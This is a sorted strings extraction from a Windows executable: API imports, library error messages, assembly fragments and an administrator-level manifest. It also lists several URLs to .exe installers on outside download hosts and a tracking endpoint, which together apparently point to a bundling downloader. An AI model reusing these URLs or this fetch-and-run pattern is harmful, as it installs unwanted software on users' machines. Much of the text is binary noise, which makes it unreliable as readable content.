cHRM chunk does not match sRGB
CImageList
ck(WSbpS
ClientToScreen
CloseClipboard
CloseDatabase
CloseHandle
ClosePrinter
CLSIDFromString
CMapPtrToPtr
CMapStringToPtr
CMemFile
CMemoryException
CNotSupportedException
CObject
color-map index out of range
color map overflow (BAD internal error)
CombineRgn
combobox
COMCTL32.dll
COMCTL32.DLL
comdlg32.dll
commctrl_DragListMsg
commdlg_ColorOK
commdlg_FileNameOK
commdlg_help
commdlg_LBSelChangedNotify
commdlg_SetRGBColor
commdlg_ShareViolation
CompareStringA
CompareStringW
conflicting calls to set alpha mode and background
Content-Transfer-Encoding: base64
Content-Type:
Content-Type: application/x-www-form-urlencoded
Content-type: multipart/mixed; boundary="#BOUNDARY#"
Content-type: text/plain; charset="
Cookie: 
CopyAcceleratorTableA
CopyRect
copyright violation: edited ICC profile ignored
CPaintDC
CPalette
CProgressCtrl
CPtrArray
CPtrList
CRC error
CreateAcceleratorTableA
CreateBitmap
CreateCompatibleBitmap
CreateCompatibleDC
CreateDCA
CreateDialogIndirectParamA
CreateDIBitmap
CreateEllipticRgn
CreateEventA
CreateFileA
CreateFontIndirectA
CreateIconFromResource
CreateIconFromResourceEx
CreateMenu
CreatePalette
CreatePen
CreatePolygonRgn
CreatePopupMenu
CreateProcessA
CreateRectRgn
CreateRectRgnIndirect
CreateRoundRectRgn
CreateSemaphoreA
CreateSolidBrush
CreateThread
CreateWindowExA
CResourceException
CryptAcquireContextA
CryptCreateHash
CryptDestroyHash
CryptGetHashParam
CryptHashData
CryptReleaseContext
CSharedFile
CStatic
CStringArray
CSyncObject
CTempDC
CTempGdiObject
CTempImageList
CTempMenu
CTempWnd
CToolTipCtrl
Ctrl+A
Ctrl+B
Ctrl+C
Ctrl+D
Ctrl+E
Ctrl+F
Ctrl+F1
Ctrl+F10
Ctrl+F11
Ctrl+F12
Ctrl+F2
Ctrl+F3
Ctrl+F4
Ctrl+F5
Ctrl+F6
Ctrl+F7
Ctrl+F8
Ctrl+F9
Ctrl+G
Ctrl+H
Ctrl+I
Ctrl+J
Ctrl+K
Ctrl+L
Ctrl+M
Ctrl+N
Ctrl+O
Ctrl+P
Ctrl+Q
Ctrl+R
Ctrl+S
Ctrl+Shift+F1
Ctrl+Shift+F10
Ctrl+Shift+F11
Ctrl+Shift+F12
Ctrl+Shift+F2
Ctrl+Shift+F3
Ctrl+Shift+F4
Ctrl+Shift+F5
Ctrl+Shift+F6
Ctrl+Shift+F7
Ctrl+Shift+F8
Ctrl+Shift+F9
Ctrl+T
Ctrl+U
Ctrl+V
Ctrl+W
Ctrl+X
Ctrl+Y
Ctrl+Z
 (*.CUR)|*.CUR|
CUserException
CWinApp
CWindowDC
CWinFormUnit
CWinThread
CWordArray
?? / %d]
D$ _^][
D$,_^]
D$,;\$|
D$(_^]
D$(_^][
D$$_^[
D$$_^]
d09f2340818511d396f6aaf844c7e325
D$0QVRP
D$0UhP
D$0UVW
D$0WPQ
D$ |2;
D$49D$$}
D$4RPQ
D$4SUV
D$4SUVW
D$89Vdu
D$(8D*
D$8QVRPU
D$8RPj
D$8VPQ
D$$~9+
damaged LZ stream
@.data
data error
Date: %s
D$(CM;
D$(CUSWP
 %d/%d 
(%d-%d):
%d / %d
%d / %d]
dddd, MMMM dd, yyyy
DDDDUUUU
D$dQUWRP
D$dSUVW
D$DURP
December
DEFAULT_ICON
#define _AFX_NO_OLE_RESOURCES
#define _AFX_NO_PROPERTY_RESOURCES
#define _AFX_NO_TRACKER_RESOURCES
 deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly 
DefWindowProcA
D$ EJ;
DELETE
DeleteCriticalSection
?=deleted
DeleteDC
DeleteFileA
DeleteMenu
DeleteObject
DestroyAcceleratorTable
DestroyCursor
DestroyIcon
DestroyMenu
DestroyWindow
device
devices
D$(FO;
D$H_^][
D$hQRP
D$hRQP
D$hSUV3
D$HUPQ
D$HUWRPQ
D$Hvm3
D$,Hx;@
Directory not empty
DispatchMessageA
DISPLAY
D$(;l$ 
D$\L>J
DllRegisterServer
DllUnregisterServer
D$LPUj
D$LUSWP
DocumentPropertiesA
Domain error
DOMAIN error
D$,Pj<j
D$ PQR
D$PQRP
D$PRPQ
DPtoLP
D$(QPW
D$(QRP
D$$QRP
D$@QRPU
D$$QUP
DrawEdge
DrawFocusRect
DrawFrameControl
DrawIconEx
DrawTextA
D$@RPQj
D$ RPUhD
D$$RSSP
D$,RVh
;D$<s!
D$,SPh
D$$SPh
D$(SUV
D$$SUV
D$(SUW
D$TRPW
D$TVPW
duplicate
DuplicateHandle
duplicate sRGB information ignored
D$@UPQ
|$D UV
D/ VPS
D$@WPS
D$Xht8J
D$XPQU
D$XQRWP
;D$xt&
ech1Y%
E=FZGrH
EHPWVS
Ellipse
EmptyClipboard
empty distance tree with lengths
EnableMenuItem
EnableWindow
EndDialog
EndDoc
#endif
#endif //_WIN32
EndPage
EndPaint
EndPath
EnterCriticalSection
EnumDisplayMonitors
EnumDisplaySettingsA
eQpenc
EqualRect
error in user chunk
Escape
ETLPuF
ExcludeClipRect
Exec format error
ExitProcess
extra compressed data
Extra compressed data
ExtSelectClipRgn
ExtTextOutA
Ex@u	U
F<_^][
F,_^][
F\_^][
F09^4u*j
F49^8u&j
F89^8u&j
F(9V8tQ
Fdf+Fh
FD@ul9L$(}f
FD uy9D$$}s
February
F(_+F$^[;E
?fff&ff23
@ffffff
$@ffffff
F$@;F(v
F$@@;F(v
file error
File exists
Filename too long
FileTimeToLocalFileTime
FileTimeToSystemTime
File too large
FillRect
FillRgn
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
F\jLSP
- floating point not loaded
FlushFileBuffers
forcing save of an unhandled chunk; please call png_set_keep_unknown_chunks
FpHt&Ht
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
Friday
From: %s
[/fS_MR
Function not implemented
Fxt_;FTu@
ga-alpha color-map: too few entries
GAIsProcessorFeaturePresent
gamma table being rebuilt
gamma value does not match libpng estimate
gamma value does not match sRGB
gamma value out of range
g~b1Y%
gb2312
=?gb2312?B?
Gdi32.dll
GDI32.dll
GetACP
GetActiveWindow
GetBkColor
GetBkMode
GetCapture
GetClassInfoA
GetClassLongA
GetClassNameA
GetClientRect
GetClipboardData
GetClipBox
GetClipRgn
GetCommandLineA
GetConnectString
GetCPInfo
GetCurrentObject
GetCurrentProcess
GetCurrentThread
GetCurrentThreadId
GetCursorPos
GetDesktopWindow
GetDeviceCaps
GetDIBits
GetDlgCtrlID
GetDlgItem
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileAttributesA
GetFileSize
GetFileTime
GetFileTitleA
GetFileType
GetFocus
GetForegroundWindow
GetFullPathNameA
GetKeyState
GetLastActivePopup
GetLastError
GetLocalTime
GetMenu
GetMenuCheckMarkDimensions
GetMenuItemCount
GetMenuItemID
GetMenuState
GetMessageA
GetMessagePos
GetMessageTime
GetModuleFileNameA
GetModuleHandleA
GetMonitorInfoA
GetNextDlgTabItem
GetObjectA
GetOEMCP
GetOpenFileNameA
GetParent
GetPolyFillMode
GetProcAddress
GetProcessHeap
GetProcessVersion
GetProfileStringA
GetPropA
GetROP2
GetSaveFileNameA
GetScrollPos
GetScrollRange
GetStartupInfoA
GetStdHandle
GetStockObject
GetStretchBltMode
GetStringTypeA
GetStringTypeW
GetSubMenu
GetSysColor
GetSysColorBrush
GetSystemMenu
GetSystemMetrics
GetSystemPaletteEntries
GetSystemTime
GetTabList
GetTextColor
GetTextExtentPoint32A
GetTextMetricsA
GetTickCount
GetTimeZoneInformation
GetTopWindow
GetVersion
GetVersionExA
GetViewportExtEx
GetViewportOrgEx
GetVolumeInformationA
GetWindow
GetWindowDC
GetWindowExtEx
GetWindowLongA
GetWindowOrgEx
GetWindowPlacement
GetWindowRect
GetWindowTextA
GetWindowTextLengthA
 (*.GIF)|*.GIF|
GlobalAddAtomA
GlobalAlloc
GlobalDeleteAtom
GlobalFindAtomA
GlobalFlags
GlobalFree
GlobalGetAtomNameA
GlobalHandle
__GLOBAL_HEAP_SELECTED
GlobalLock
GlobalReAlloc
GlobalSize
GlobalUnlock
gray[16] color-map: too few entries
gray[8] color-map: too few entries
gray-alpha color-map: too few entries
gray+alpha color-map: too few entries
Gray color space not permitted on RGB PNG
GrayStringA
`h````
h9n`u;
h BGRUPV
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
hgjlkbrfzaoe
HHtiHtGH
HHtpHHtl
hIST must be after
hknilUPV
H:mm:ss
hPCCiU
|$HPWS
HrCg@b	g 
HSVHWtgHHtF
hTADIV
HtfHt;Ht
Ht#HHt
HtHHt(
HtHHuz
Ht]Ht2Ht
Ht&HtcI
HtOHt)H
htsbaUQV
HtTHtFHt8Ht*Ht
http://
HTTP/1.0
HTTP/1.1
http://4006869752.com/admin/get.php?user=114lm&id=22338&index=7
@http://dlsw.br.baidu.com/ditui/zujian/BaiduAn.Setup.1117.3.0.0.3974_1000163887.exe
http://dlsw.br.baidu.com/ditui/zujian/Baidusd.Setup.3.0.0.4607.youqian_1000163887.exe
http://dlsw.br.baidu.com/ditui/zujian/bdBrowserSetup-5955-ftn_1000163887.exe
http://down.9vh.net/apples_19_708.exe
http://down.qunasou.com/tq/tq_b_80282.exe
http://down.tianyunxj.com/14/tqrl_93_708.exe
http://down.xiaoxinrili.com/hezi/jm/ad7147.exe
http://j.union.ijinshan.com/jump.php?u_key=389775
HttpOpenRequestA
HttpQueryInfoA
https://
HttpSendRequestA
http://www.cdhomexpo.cn/ffdy_434_874824.exe
http://www.huohuasheji.com/kuplay_930_874824.exe
hWj@_;
hYARGUQV
_hypot
ICC profile tag outside profile
ICC profile tag start not a multiple of 4
 (*.ICO)|*.ICO|
#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)
#ifdef _WIN32
ignored in grayscale PNG
Ignoring invalid time value
ignoring out of range rgb_to_gray coefficients
Illegal byte sequence
Image height exceeds user limit in IHDR
Image height is zero in IHDR
ImageList_Destroy
Image width exceeds user limit in IHDR
Image width is zero in IHDR
Improper link
Inappropriate I/O control operation
#include "l.chs\afxres.rc"          // Standard components
incompatible version
incomplete distance tree
incomplete dynamic bit lengths tree
incomplete literal/length tree
inconsistent chromaticities
inconsistent rendering intents
incorrect data check
incorrect header check
 inflate 1.1.3 Copyright 1995-1998 Mark Adler 
InflateRect
InitCommonControlsEx
InitializeCriticalSection
Input/output error
insufficient memory
Insufficient memory for hIST chunk data
Insufficient memory for pCAL parameter
Insufficient memory for pCAL params
Insufficient memory for pCAL purpose
Insufficient memory for pCAL units
Insufficient memory to process text chunk
insufficient memory to read chunk
intent outside defined range
InterlockedDecrement
InterlockedIncrement
internal error: array alloc
internal error: array realloc
internal error checking chromaticities
internal error handling cHRM coefficients
internal error handling cHRM->XYZ
internal row logic error
internal row size calculation error
internal row width error
internal sequential row size calculation error
InternetCanonicalizeUrlA
InternetCloseHandle
InternetConnectA
InternetCrackUrlA
InternetOpenA
InternetReadFile
InternetSetOptionA
Interrupted function call
IntersectRect
invalid
invalid after png_start_read_image or png_read_update_info
invalid alpha mode
Invalid argument
InvalidateRect
Invalid attempt to read row data
invalid background gamma type
invalid before the PNG header has been read
Invalid bit depth in IHDR
invalid bit length repeat
invalid block type
invalid chromaticities
invalid chunk type
Invalid color type/bit depth combination in IHDR
Invalid color type in IHDR
invalid data
invalid distance code
invalid embedded Abstract ICC profile
invalid error action to rgb_to_gray
Invalid filter method in IHDR
Invalid format for pCAL parameter
invalid ICC profile color space
Invalid IHDR data
Invalid image height in IHDR
Invalid image width in IHDR
invalid index
invalid length
invalid literal/length code
invalid location in png_set_unknown_chunks
invalid memory read
Invalid palette
Invalid palette length
Invalid palette size, hIST allocation skipped
invalid parameter count
Invalid pCAL equation type
Invalid pCAL parameter count
invalid PNG color type
invalid rendering intent
Invalid sCAL height
Invalid sCAL unit
Invalid sCAL width
Invalid seek
invalid signature
invalid sRGB rendering intent
invalid stored block lengths
invalid unit
invalid user transform pixel depth
invalid values
invalid window size
invalid with alpha channel
IQh,bJ
Is a directory
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
IsChild
IsDialogMessageA
IsIconic
IsRectEmpty
IsWindow
IsWindowEnabled
IsWindowVisible
IsZoomed
It#Iu%
\$\}-j
J141BBEBBcac9cac9cac9cac9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9Z]Z9cac9cac9cac9cac9BEBB101B
JanFebMarAprMayJunJulAugSepOctNovDec
January
jBWVSSQ
JIJ)sus)
J! !J! !J! !J
JMJ!{}{
)JMJ!BEB
JPEGMEM
 (*.JPG)|*.JPG|PNG
 (*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
j VUPWQ
*:JZjz
KERNEL32
kernel32.dll
Kernel32.dll
KERNEL32.dll
KillTimer
+;K[k{
)kmk1{}{1141B
known incorrect sRGB profile
kXEQ>\u
^l_^][
;l$ }:
L$ ]_^
L$$_^]
L$0PQR
L$0PQS
L$0SUV@W
L23fff&ff
L$,_^]3
L$,_[3
L$4_^3
L$4_^[d
L$4S+L$0Qj
L$4SUV
L$4UQWP
L$4VQUP
L$4WPQR
L$4WQUVS
L$8^]_3
L$89l$8}
L$8_^][d
L$8WPQR
LANGUAGE 4, 2
LCMapStringA
LCMapStringW
=lcmnw_tQ=tsbat-=knilt	=rtnmto
L$`_^][d
L$|_^][d
L$ ^][d
L$ _^d
L$ _^][d
L$,_^][d
L$(_^][d
L$@^[d
L$@_^][d
L$$^[d
L$$^]d
L$$_^d
L$$_^]d
L$$_^][d
L$\_^][d
L$D_^[d
L$D_^][d
L$D_]d
L$DPQj
L$dPQRV
L$dRQP
L$DSVQ
LeaveCriticalSection
length does not match profile
l	g~b0R 
l	g~b0Rdk
L$h_^]3
L$h_^][d
L$H_^][d
L$H][d
L$$h(>J
L$Hj&Q
L$$hl"J
l$HQRVU
L$HSUVWP
L$hUQR
libpng does not support gamma+background+rgb_to_gray
libpng error: %s
libpng warning: %s
LineTo
L$$j QV
,<L\l|
L$L_^]3
L$l_^][d
L$L^[d
L$L_^][d
L$lRVQ
L$Lvj3
LoadBitmapA
LoadCursorA
LoadIconA
LoadImageA
LoadLibraryA
LoadResource
LoadStringA
LocalAlloc
LocalFree
LocalReAlloc
location:
Location:
LockFile
LockResource
lost/gained channels
lost rgb to gray
L$P_^d
L$P_]^[d
L$pPQR
L$ PQh
L$(PQR
L$pRPQ
LPtoDP
L$$PVh
L$ QSR
L$ QUS
L$,QWV
L$$QWV
L$(RPQ
L$<RPQW
L$(RPVQWU
L$@RQj
L$ RUPj
L$@RUQ
L$<RWUQV
L$<SQR
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrcpynA
lstrlenA
L$,SUV
L$(SUV
:L$<t;
L$T_^]
L$t_^d
L$t][d
L$T_^]d
L$T_^][d
|$LtE;
L$TPQR
L$TSWQ
L$(UUh
\$lUV3
L$(VQU
L$(VQVj
l$@VW3
l$<VWj
L$ WPQ
L$(WQR
L$(WSR
l$,WuAS
L$X_^]3
L$x_^d
L$x_^][d
L$X_^d
L$Xh`[
L$Xh$8J
L$Xh(:J
L$X;L$
L$XSQh
@;l$\~Z
mailto:
malformed sPLT chunk
MapWindowPoints
M/d/yy
Memory allocation failed while processing sCAL
MessageBoxA
MGridCells
Microsoft Visual C++ Runtime Library
midiOutPrepareHeader
midiOutReset
midiOutUnprepareHeader
midiStreamClose
midiStreamOpen
midiStreamOut
midiStreamProperty
midiStreamRestart
midiStreamStop
 (*.MID)|*.MID|
MIME-Version: 1.0
missing IHDR
Missing IHDR before IDAT
missing LZ dictionary
Missing PLTE before IDAT
-=M]m}
MNG features are not allowed in a PNG datastream
ModifyMenuA
Monday
MonitorFromPoint
MonitorFromRect
MonitorFromWindow
MoveFileA
MoveToEx
MoveWindow
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Mpr.dll
MS Sans Serif
MS Shell Dlg
__MSVCRT_HEAP_SELECT
MulDiv
MultiByteToWideChar
n0SSSSU
N4_^]3
-NbkSbpS
-NbkSbpS(
nd9~dt
need dictionary
N/f@b	g
NH_^][
Nh;NX|
.>N^n~
-N"N1Y
N*Ncktepe
N*Ntepe
N*N(W%
N*N(W0
No child processes
No error
No locks available
non-positive height
non-positive width
no space in chunk cache
No space in chunk cache for sPLT
No space left on device
No such device
No such device or address
No such file or directory
No such process
Not a directory
Not a PNG file
Not enough image data
Not enough space
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
nt2Ht#Ht
NTRPQj
(null)
NULL row buffer
N$~	WU
NX9NXu 
Nyt2S	W	w	w
nzzpenc
O(_^][
o0SSSSU
October
OffsetRect
OffsetViewportOrgEx
ole32.dll
OLEAUT32.dll
OleInitialize
OleUninitialize
OpenClipboard
OpenDatabase
OpenPrinterA
Operation not permitted
O(uckHr
out-of-date sRGB profile with no signature
out of memory
Out of memory
out of place
out.prn
output gamma out of expected range
oversubscribed distance tree
oversubscribed dynamic bit lengths tree
oversubscribed literal/length tree
OX[0R 
~P9~Pun
PA#define _AFX_NO_SPLITTER_RESOURCES
palette color-map: too few entries
Palette is NULL in indexed image
PatBlt
PathToRegion
.PAVCArchiveException@@
.PAVCException@@
.PAVCFileException@@
.PAVCMemoryException@@
.PAVCNotSupportedException@@
.PAVCObject@@
.PAVCResourceException@@
.PAVCSimpleException@@
.PAVCUserException@@
PCS illuminant is not D50
PeekMessageA
Permission denied
Ph_^][Y
P#include "afxres.h"
png_do_encode_alpha: unexpected call
png_do_quantize returned rowbytes=0
png_do_rgb_to_gray found nongray pixel
PNG file corrupted by ASCII conversion
PNG fixed point integer out of range
png_image_begin_read_from_memory: incorrect PNG_IMAGE_VERSION
png_image_begin_read_from_memory: invalid argument
png_image_finish_read[color-map]: no color-map
png_image_finish_read: damaged PNG_IMAGE_VERSION
png_image_finish_read: invalid argument
png_image_read: alpha channel lost
png_image_read: opaque pointer not NULL
png_image_read: out of memory
 (*.PNG)|*.PNG|BMP
png_read_image: invalid transformations
png_read_image: unsupported transformation
png_read_update_info/png_start_read_image: duplicate call
png_set_filler: inappropriate color type
png_set_filler is invalid for low bit depth gray output
png_set_keep_unknown_chunks: invalid keep
png_set_keep_unknown_chunks: no chunk list
png_set_keep_unknown_chunks: too many chunks
png_set_sPLT: invalid sPLT
png_set_unknown_chunks now expects a valid location
PNG unsigned integer out of range
PostMessageA
PostQuitMessage
Potential overflow in png_zalloc()
PPPPhd
PPPPPPPP
PPPQSG
P<PuWSV
ppxxxx
PQj WUS
PQQQQQ
\$ PQV
#pragma code_page(936)
PreviewPages
 (*.prn)|*.prn|
profile '
Program: 
<program name unknown>
P$RWPh 
=pscat
~'PSQR
PtInRect
PtVisible
- pure virtual function call
@PVj,S
\$PVUUS
PWVWWW
qdZRMHD@=;86421/.-+*)(''&%$$#""!!  
Qf9=8VL
Qkkbal
QPSWVR
QQSVW3
QQSVWd
QQSVWj
QQUWSS
QRVWPU
QRWhPbJ
QSUVWj
\$@QUR
QX[gbL
QyReSOT5U
RaiseException
RASAPI32.dll
RasGetConnectStatusA
RasHangUpA
`.rdata
read beyond end of data
Read Error
ReadFile
Read-only file system
RealizePalette
Rectangle
RectVisible
RedrawWindow
Referer:
Referer: 
RegCloseKey
RegCreateKeyExA
RegisterClassA
RegisterClipboardFormatA
RegisterWindowMessageA
RegOpenKeyExA
RegQueryValueA
RegSetValueExA
ReleaseCapture
ReleaseDC
ReleaseSemaphore
RemovePlayer
RemovePropA
Reply-To: %s
Resource deadlock avoided
Resource device
resource.h
Resource temporarily unavailable
RestoreDC
Result too large
ResumeThread
rgb-alpha color-map: too few entries
rgb+alpha color-map: too few entries
rgb color-map: too few entries
RGB color space not permitted on grayscale PNG
rgb[ga] color-map: too few entries
rgb[gray] color-map: too few entries
RoundRect
Row has too many bytes to allocate in memory
|$,RPQ
!RQR9RQR9! !J
R! !R! !R
RSbpS\O
RtlUnwind
=rtrpt =rncst
runtime error 
Runtime Error!
RUR)9<9
RVPUSQ
Saturday
SaveDC
Saving unknown chunk:
SbpS0R
SbpS@b	gu
SbpS:g:
SbpS\O
ScaleViewportExtEx
ScaleWindowExtEx
ScreenToClient
ScrollWindowEx
SelectClipRgn
SelectObject
SelectPalette
SendDlgItemMessageA
SendMessageA
September
sequential row overflow
SetActiveWindow
SetBkColor
SetBkMode
SetCapture
SetClipboardData
Set-Cookie
Set-Cookie:
SetCurrentDirectoryA
SetCursor
SetCursorPos
SetEndOfFile
SetEnvironmentVariableA
SetErrorMode
SetEvent
SetFilePointer
SetFocus
SetForegroundWindow
SetHandleCount
SetLastError
SetMapMode
SetMenu
SetMenuItemBitmaps
SetParent
SetPolyFillMode
SetPropA
SetRect
SetRectEmpty
SetROP2
SetScrollPos
SetScrollRange
SetStdHandle
SetStretchBltMode
SetTextColor
SetTimer
Settings
SetUnhandledExceptionFilter
SetViewportExtEx
SetViewportOrgEx
SetWindowExtEx
SetWindowLongA
SetWindowOrgEx
SetWindowPos
SetWindowRgn
SetWindowsHookExA
SetWindowTextA
Shell32.dll
SHELL32.dll
ShellExecuteA
Shell_NotifyIconA
\shell\open\command
Shift+F1
Shift+F10
Shift+F11
Shift+F12
Shift+F2
Shift+F3
Shift+F4
Shift+F5
Shift+F6
Shift+F7
Shift+F8
Shift+F9
ShowWindow
SING error
sO;>|C;~
software
sPLT chunk has bad length
sPLT chunk requires too much memory
sPLT chunk too long
sPLT out of memory
)sqs){}{
sqs)! !9
%s <%s>
SS@SSPVSS
_SSSSU
StartDocA
StartPage
stream end
stream error
StretchBlt
Subject: %s
Sunday
SunMonTueWedThuFriSat
sus))()B
SWVVVRPV
System
SystemParametersInfoA
T$$_^]
T$0PQR
T$0SUV
T$0;t$
T$0VRPSQ
T+3x%A
@t4Ht1Ht_Ht
T$8QRP
T$8QRU
T$8RWj
T$8u	f9
t$ 90t
t	9p$u
t&9^$t
TabbedTextOutA
=TADIt
TADIu"
TADIut
tag count too large
T$$+D$4
tD9_Pt?
T$dPQR
T$DPQRW
T$DPVS
T$DQRU
T$DQSR
T$Du	f
T$DWRh
T$\;D$Xu
t(ENEN;
TerminateProcess
text chunk: out of memory
text compression mode is out of range
TextOutA
T/f&Tcknx
<]t_G<-uA
!This program cannot be run in DOS mode.
T$HQRP
t>Ht Ht
t+Ht$Ht
Thursday
T$H} VP
tI;Ftr
T$\jdSR
+tJHt:Ht*
tkPUSV
tL9~HvG;
 tLhhBJ
TLOSS error
T$LPQR
T$lPRh
T$LRWS
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
t$LUPh
T$LWUQVR
tn<%t2
tooltips_class32
Too many IDATs found
too many length or distance symbols
Too many links
Too many open files
Too many open files in system
too many profiles
too many sPLT chunks
too many text chunks
too many unknown chunks
Too much image data
too short
To: %s
T$pPQR
t$PPVS
T$,PQh
T$,PQR
T$(PQR
T$\PQR
T$PQRP
T$ PQW
T$$PRV
tq9~Dt
T$ QRP
T$<QRVV
T$(QVURWP
TranslateAcceleratorA
TranslateMessage
trhPCJ
tRHt}H
tRNS chunk has out-of-range samples for bit_depth
tRNS must be after
T$,RQP
t%RSQP
truncated
t$$RVP
T$<RVW
T$,RWV
tS9~@uN
T$ SRh
T$,SRh
T$,SRW
t$(SSh
t#SSUP
T$ SWRP
t!< t	<
^tt!hh3J
+ttHHtd
t.;t$$t(
t$,u%:D$<u
Tuesday
t$$VSS
tvWWWWU
T$<WRh
T$\WVR
t/WWUPj
T$XhL8J
 (*.txt)|*.txt|
T$XUSR
;t$Xu";\$\u
tYh`dJ
?u='@^
u._^][
u29l$xu,
u"8D$yu
u]9B uX
\$$u9f;
u	9~@u
uf9=@UL
>:u#FV
uh9^8uX
- unable to initialize heap
- unable to open console device
undefined
unexpected 8-bit transformation
unexpected alpha swap transformation
unexpected bit depth
unexpected compose
unexpected DeviceLink ICC profile class
unexpected encoding (internal error)
unexpected end of LZ stream
- unexpected heap error
unexpected ICC PCS encoding
- unexpected multithread lock error
unexpected NamedColor ICC profile class
unexpected zlib return
unexpected zlib return code
>:uNFV
unhandled critical chunk
UnhandledExceptionFilter
UnhookWindowsHookEx
Uninitialized row
unknown chunk exceeds memory limits
unknown chunk: out of memory
unknown compression method
Unknown compression method in IHDR
unknown compression type
Unknown error
Unknown filter method in IHDR
Unknown interlace method in IHDR
unknown interlace type
UNLINK
UnlockFile
unrecognized equation type
unrecognized ICC profile class
UnregisterClassA
unsupported zlib version
UpdateWindow
uR9BxuM
uRFGHt
us-ascii
USER32
user32.dll
User32.dll
USER32.dll
User-Agent:
 using zstream
u$SShe
""""UUUU
\$(UVW
ValidateRect
VC20XC00U
V#D$,WPQ
Vh;VX|
VirtualAlloc
VirtualFree
|$ VurU
\$<VW3
VWtp9E
V,_^[Y
W9^du-
WaitForInputIdle
WaitForMultipleObjects
WaitForSingleObject
waveOutClose
waveOutGetNumDevs
waveOutOpen
waveOutPause
waveOutPrepareHeader
waveOutReset
waveOutUnprepareHeader
waveOutWrite
 (*.WAV;*.MID)|*.WAV;*.MID|WAV
 (*.WAV)|*.WAV|MIDI
Wednesday
	WG!2S(
WideCharToMultiByte
window
WindowFromPoint
windows
WinExec
WinHelpA
wininet.dll
WININET.dll
WINMM.dll
WINSPOOL.DRV
WjdjdPQh
Wj(_Wj
|$$}$WP
(wqt\HHtS
WriteFile
WritePrivateProfileStringA
WS2_32.dll
wsprintfA
WTWindow
|$@ Wu
|$ WUSV
wvsprintfA
"WWShx
WWVQRWWS
wwwww@
wwwwwp
wwwwwt
wwwwww
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">    <security>        <requestedPrivileges>            <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>        </requestedPrivileges>    </security></trustInfo></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPA